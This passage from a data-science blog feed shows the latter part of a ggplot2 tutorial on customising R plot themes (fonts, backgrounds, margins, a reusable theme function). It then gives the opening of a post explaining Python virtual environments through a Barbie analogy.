&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_line&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey50&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lato&amp;#34;&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;## modify font&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;18&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;## modify positioning and size&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="graphics/text.png" alt="The same scatter plot as above (theme minimal, legend at bottom, grey axes, no grid lines) but all text now uses the lato font, and the main plot title is centered and larger." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;the &lt;code&gt;family&lt;/code&gt; argument lets us specify the font: we&amp;rsquo;re using the lato font here. I won&amp;rsquo;t delve too much into fonts, but &lt;a href="https://cran.r-project.org/web/packages/showtext/vignettes/introduction.html" rel="external"&gt;{showtext}&lt;/a&gt; is a package that makes using a wide variety of fonts straightforward. I&amp;rsquo;d definitely recommend playing with fonts if you&amp;rsquo;re looking to develop a theme for a corporate identity, or simply add some personality to a plot.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;hjust&lt;/code&gt; argument controls the &lt;em&gt;horizontal justification&lt;/em&gt;, essentially, the positioning of the text. &lt;code&gt;hjust = 0&lt;/code&gt; is left justification (the text is moved to the left), &lt;code&gt;hjust = 1&lt;/code&gt; is right justification (text moved to the right), and numbers between 0 and 1 will position the text somewhere between the far right and far left. Setting &lt;code&gt;hjust = 0.5&lt;/code&gt; centers the text for us. I&amp;rsquo;ve not used &lt;code&gt;vjust&lt;/code&gt;, but this argument adjusts the vertical justification. Note that on the y axis, &lt;code&gt;hjust&lt;/code&gt; moves the text along the axis, and &lt;code&gt;vjust&lt;/code&gt; moves the text closer to/further away from the y axis. The &lt;code&gt;size&lt;/code&gt; argument is just the font size in &lt;code&gt;pts&lt;/code&gt;, something we will all be familiar with. The result is that the text, especially the title, shines through a little more.&lt;/p&gt;
&lt;h4 id="borders-and-backgrounds"&gt;Borders and backgrounds&lt;/h4&gt;
&lt;p&gt;Borders and backgrounds are next on our list of things to modify. We use &lt;code&gt;element_rect()&lt;/code&gt; (rect as in rectangle) to change the styling of things such as the background around our legend or the entire plot background. By default, the legend background will be the same as the plot background, so it isn&amp;rsquo;t actually obvious that the legend even has a background! We&amp;rsquo;re going to modify the plot background here. The plot is currently sitting on a white background, and the web page you&amp;rsquo;re viewing also has a white background. This means that the plot melts into the webpage. This isn&amp;rsquo;t necessarily a bad thing, but you might want to frame your plot a bit by putting in on a coloured background. Alternatively, you might have a corporate slide deck with a coloured background, and want the plot to melt into this background.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_line&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey50&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lato&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;18&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#dffffc&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#dffffc&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;fill&lt;/code&gt; argument here changes the actual plot background. The &lt;code&gt;colour&lt;/code&gt; argument (&lt;code&gt;color&lt;/code&gt; will also work if you&amp;rsquo;re u-averse) controls the colour of a thin border all the way around the plot. The colour &lt;code&gt;#dffffc&lt;/code&gt; is a very pale blue, which ensures that there is sufficient contract between the points and background of the plot. This is an important accessibility feature, so do think very carefully about how changing the background colour of your plot may impact the ability for other people to properly absorb the message you are trying to communicate. I&amp;rsquo;d generally avoid changing the background colour, but it&amp;rsquo;s useful here for demonstration purposes. To reiterate: if you &lt;em&gt;do&lt;/em&gt; change the background colour, take care to ensure that accessibility is not compromised.&lt;/p&gt;
&lt;img src="graphics/background.png" alt="The same scatter plot as above (theme minimal, legend at bottom, grey axes, no grid lines, modified text) but entire plot background has been changed to a pale blue colour." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;That brings to a close our introduction to each of the &lt;code&gt;element_*()&lt;/code&gt; functions. I know it was a bit traumatic before, but if you type &lt;code&gt;?theme&lt;/code&gt; into your R console, you&amp;rsquo;ll notice that the help page tells you which &lt;code&gt;element_*()&lt;/code&gt; function you need to use for each &lt;code&gt;theme()&lt;/code&gt; argument.&lt;/p&gt;
&lt;h4 id="creating-space"&gt;Creating space&lt;/h4&gt;
&lt;p&gt;The last function that we use to modify aspects of a theme is &lt;code&gt;margin()&lt;/code&gt;. Margin is a little bit different to the &lt;code&gt;element_*()&lt;/code&gt; functions, instead of controlling colours, fonts and line types, &lt;code&gt;margin()&lt;/code&gt; lets us create or remove space around certain aspects of our theme by modify distances. If an argument needs to be modified with &lt;code&gt;margin()&lt;/code&gt;, it&amp;rsquo;s likely that the argument name looks like &lt;code&gt;something.margin&lt;/code&gt;. You may also notice that &lt;code&gt;element_text()&lt;/code&gt; has a margin argument - use &lt;code&gt;margin()&lt;/code&gt; here to create space around the text aspects of your plot.&lt;/p&gt;
&lt;p&gt;There are 5 arguments to &lt;code&gt;margin()&lt;/code&gt;: &lt;code&gt;t&lt;/code&gt;, &lt;code&gt;r&lt;/code&gt;, &lt;code&gt;b&lt;/code&gt;, &lt;code&gt;l&lt;/code&gt; and &lt;code&gt;unit&lt;/code&gt;. &lt;code&gt;t&lt;/code&gt;, &lt;code&gt;r&lt;/code&gt;, &lt;code&gt;b&lt;/code&gt; and &lt;code&gt;l&lt;/code&gt; are short for top, right, bottom and left - to remember the order, it&amp;rsquo;s just clockwise from the top. You should assign a number to these arguments, then &lt;code&gt;unit&lt;/code&gt; is simply the units of these values. &lt;code&gt;unit&lt;/code&gt; defaults to &lt;code&gt;pt&lt;/code&gt;, which scales well with text, but you can choose something else if that makes more sense to you.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s now modify the space between (a) the plot title and the scatterplot itself and also (b) the legend and the x axis.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_line&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey50&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lato&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;18&lt;/span&gt;, margin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;margin&lt;/span&gt;(b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# modify title-plot spacing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#dffffc&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#dffffc&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.margin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;margin&lt;/span&gt;(t &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# modify x axis-legend spacing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="graphics/margin.png" alt="The same scatter plot as above (theme minimal, legend at bottom, grey axes, no grid lines, modified text, pale blue background) but there is now more space between the plot title and main plot, and the legend and the main plot." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Now this is our final plot! Each individual step made a minor adjustment to the plot, but added together, we have a plot with a much improved appearance.&lt;/p&gt;
&lt;h3 id="bringing-it-all-together"&gt;Bringing it all together&lt;/h3&gt;
&lt;p&gt;An important programming concept is don&amp;rsquo;t repeat yourself (DRY). This applies to constructing graphics as well. We don&amp;rsquo;t want to copy and paste our theme for every plot we make. The great thing about {ggplot2} themes is that they can be effortlessly applied to basically any plot. All we have to do it turn out theme into a function, and then it can be used just like any of the &amp;ldquo;built in&amp;rdquo; {ggplot2} themes. For example:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_theme &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_line&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey50&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lato&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;18&lt;/span&gt;, margin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;margin&lt;/span&gt;(b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#dffffc&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#dffffc&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.margin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;margin&lt;/span&gt;(t &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;notice that the first line of the function is &lt;code&gt;theme_minimal()&lt;/code&gt;, we used this theme as a starting point for our custom theme.&lt;/p&gt;
&lt;p&gt;Then we can apply this to any other plot as we would apply a standard {ggplot2} theme:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_boxplot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; species, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; flipper_length_mm)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_boxplot&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#ff9300&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Species&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Flipper length (mm)&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Which type of penguin has the longest flippers?&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_boxplot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;my_theme&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="graphics/boxplot.png" alt="A boxplot (vertical arrangement) with penguin flipper length (mm) on the y axis and species on x axis. Adelie penguins have median 190 and (LQ, UQ) = (185, 195). Chinstrap penguins have median 195 and (LQ, UQ) = (190, 200). Adelie penguins have median 215 and (LQ, UQ) = (210, 2205)." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;That was easy! We can just add &lt;code&gt;my_theme()&lt;/code&gt; to all of our plots to ensure consistent styling. If we wanted to make minor adjustments to the theme for a specific plot, we can just add on the &lt;code&gt;theme()&lt;/code&gt; command again and make the required adjustments.
If you want to apply the style to all plots in a single script or report, &lt;code&gt;theme_set()&lt;/code&gt; is a really handy way to do this.&lt;/p&gt;
&lt;h3 id="what-next"&gt;What next?&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;theme()&lt;/code&gt; function has a lot of arguments, and it can feel overwhelming if you&amp;rsquo;re wanting to start modifying your own theme. We&amp;rsquo;ve managed to gain a little bit of experience with the tools that modify a {ggplot2} theme, and now you should have the confidence to modify other elements on your own, and try out the different arguments in &lt;code&gt;element_*()&lt;/code&gt; functions.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re wanting to explore what makes a really good chart, I&amp;rsquo;d recommend the &lt;a href="https://royal-statistical-society.github.io/datavisguide/" rel="external"&gt;RSS style guide&lt;/a&gt; for practical, actionable advice on constructing publication-ready graphics with examples in both R and Python. Cara Thompson gave the keynote talk at our 2023 edition of &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt;; her talk walked us though 10 important considerations for making text shine within a data visualisation, and her &lt;a href="https://www.cararthompson.com/talks/shiny-dynamic-annotations/" rel="external"&gt;slides&lt;/a&gt; are packed with with ways to make your plots awesome.&lt;/p&gt;
&lt;p&gt;If you feel like going back to basics would really help you out, booking onto one of our upcoming &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data Visualisation with {ggplot2}&lt;/a&gt; is a great way to get to grips with a wide variety of {ggplot2} features.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/intro-to-theme-ggplot2-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Python Virtual Environments and Barbie</title><link>https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/</link><pubDate>Thu, 16 Nov 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Having recently been to see the Barbie movie, it got us thinking: Barbie and Python have more things in common than meets the eye (step aside Ken!). For a start, they are both pioneers in their respective fields: Barbie is a famous fashion doll owned by millions of people around the globe, while Python is a famous programming language with millions of users worldwide. Barbie is well known for her wide range of careers, outfits and accessories. Meanwhile, Python comes in many different versions and has thousands of dedicated libraries and packages.&lt;/p&gt;
&lt;p&gt;Crucially, they are both &lt;strong&gt;customisable&lt;/strong&gt;. Barbie can be dressed in different outfits from her wardrobe to meet the demands of her busy schedule, whether that&amp;rsquo;s a day at the beach, governing her country, or kicking back for a quiet night in. With Python, meanwhile, we can customise our programming environment and switch between different combinations of packages and versions to tackle our data science projects. This is made possible through &lt;em&gt;virtual environments&lt;/em&gt;.&lt;/p&gt;
&lt;h2 id="what-is-a-virtual-environment"&gt;What is a virtual environment?&lt;/h2&gt;
&lt;p&gt;Virtual environments are tools used in software development to create isolated environments for different projects. These environments allow developers to manage dependencies and packages separately for each project. This helps avoid conflicts between different project requirements and keeps everything organised. Each virtual environment is like a contained space where you can install packages without affecting the global Python installation.&lt;/p&gt;
&lt;img src="py-versions.png" alt="Three depictions of the Python logo dressed up in different outfits. Under each logo is a box containing text, each showing a different Python version number and a unique combination of Python packages (such as NumPy) with different package versions." style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;While Barbie and Python virtual environments might seem unrelated at a first glance, there are some similarities:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Customisation&lt;/strong&gt;: Just like how you can dress up Barbie in different outfits and accessories, you can customise each Python virtual environment with specific packages and dependencies tailored to the needs of your project.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Isolation&lt;/strong&gt;: Barbie&amp;rsquo;s different outfits don&amp;rsquo;t interfere with each other, just as Python virtual environments keep the dependencies of different projects separate, preventing conflicts.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Organisation&lt;/strong&gt;: Barbie&amp;rsquo;s wardrobe allows her clothes to be neatly stored rather than strewn all over the floor. With Python virtual environments we can work with just the project-specific dependencies rather than hundreds of conflicting packages at once (never a good idea).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Portability&lt;/strong&gt;: If you&amp;rsquo;re lucky enough to own multiple Barbies, you can try the same outfit on different Barbies. Similarly, with Python you can duplicate an environment to work on the same project across multiple machines and share it with your colleagues.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-py-virtual-envs"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
